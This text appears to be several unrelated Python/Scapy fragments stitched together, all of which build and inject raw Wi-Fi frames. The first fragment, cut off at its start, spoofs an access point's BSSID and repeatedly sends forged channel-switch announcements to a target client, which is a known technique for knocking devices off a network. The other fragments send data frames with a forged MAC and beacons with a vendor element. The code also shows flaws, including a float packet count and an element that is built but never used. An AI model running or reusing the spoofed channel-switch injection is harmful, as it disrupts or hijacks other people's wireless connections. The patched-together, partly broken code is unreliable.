    dot11 = Dot11(type=0, subtype=13, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"])
    category = ('\x04' # public action
                '\x04') #channel switch announcement
    csa = Dot11Elt(ID='Extended Channel Switch Announcement', info=(
        '\x00' #Channel switch mode
        '\x0B' #new channel
        '\x00')) #channel switch cnt
    quiet = Dot11Elt(ID='Quiet', info=(
        '\x00' #Quiet count | remaining beacon intervals before quiet interval starts (0 for direct)
        '\x00' #Quiet period | number of beacon intervals to wait in between
        '\x00\x40' #Quiet duration | length of quiet period in time units (TU)
        '\x00\x00')) #Quiet offset | possibility to specify another offset after start time. Unclear?
    frame = RadioTap()/dot11/category/csa
    printTime()
    while(time.time() < timeToRun):
        sendp(frame, iface=config["iface"], loop=0, verbose=0)
        time.sleep(config["interval"])
    printTime()
def geracao_pacotes():
    """Interactively build a data frame (type 2, subtype 0) and send it for a chosen duration.

    Prompts (in Portuguese) for a reference-point name, the run time in
    minutes and the send interval in seconds. The packet count is
    ``minutes * 60 / interval`` and is passed to ``sendp`` as a float —
    NOTE(review): ``count`` presumably expects an int; confirm. The forged
    transmitter MAC comes from ``criacao_mac_ponto_referencia(name)`` and is
    written out afterwards by ``escreve_arquivo``. The payload is a long
    constant ``"UFRRJ"`` string; the interface name is hard-coded.
    """
    nome_ponto_referencia = input('Insira o nome do Ponto de Referência: ')
    mac_forjado_pr = criacao_mac_ponto_referencia(nome_ponto_referencia)
    tempo_execucao = float(input("Insira o tempo de execucao (minutos): "))
    print('\n_________________________________________')
    intervalo_envio = float(
        input(
            "Insira o intervalo de frequencia de envio de pacotes (em segundos) : "
        ))
    print('\n_________________________________________')
    num_pacotes = (tempo_execucao * 60) / intervalo_envio
    data = "UFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJ"
    ## addr1 = destination MAC (the wireless card's MAC)
    ## addr2 = source MAC address of the sender (forged MAC)
    ## addr3 = access point MAC address.
    dot11 = Dot11(type=2, subtype=0, addr1='E4:18:6B:4B:94:00', addr2=mac_forjado_pr, addr3='33:33:33:33:33:33')
    essid = Dot11Elt(
        ID='SSID', info='testSSID', len=len('testSSID'))  # indicates the access point's capability (author's note)
    frame = RadioTap() / dot11 / essid / data
    frame.show()
    input("Digite enter para o inicio do envio de pacotes:")
    sendp(
        frame, iface='wlp3s0mon', inter=intervalo_envio, loop=0, count=num_pacotes
    )  # iface = wireless interface name. inter = gap between packets (seconds). count = number of packets
    escreve_arquivo(nome_ponto_referencia, mac_forjado_pr)
def send_beacon_frame(self, inter=0.010, loop=0):
    """Send a beacon with a fixed SSID and a vendor-specific element.

    Args:
        inter: gap between frames in seconds (default 10 ms).
        loop: ``sendp`` loop flag (default 0, send once).

    Uses ``self.bc_mac`` (addr1), ``self.tx_mac`` (addr2), ``self.bssid``
    (addr3), ``self.iface`` and ``self.get_legacy_radiotap(rate=1)`` for the
    RadioTap header. Per the author's note the frame lasts 736 µs at 1 Mbps.
    The vendor element carries OUI ``0x544a55`` and nine zero bytes.
    """
    network_name = '000000-0000-0000'
    header = Dot11(type=0, subtype=8, addr1=self.bc_mac, addr2=self.tx_mac, addr3=self.bssid)
    body = Dot11Beacon(timestamp=0, beacon_interval=100, cap=0)
    ssid_elt = Dot11Elt(ID='SSID', info=network_name, len=len(network_name))
    vendor_elt = Dot11EltVendorSpecific(len=None, oui=0x544a55, info=b'\x00' * 9)
    pkt = self.get_legacy_radiotap(rate=1) / header / body / ssid_elt / vendor_elt
    sendp(pkt, iface=self.iface, inter=inter, loop=loop, verbose=False)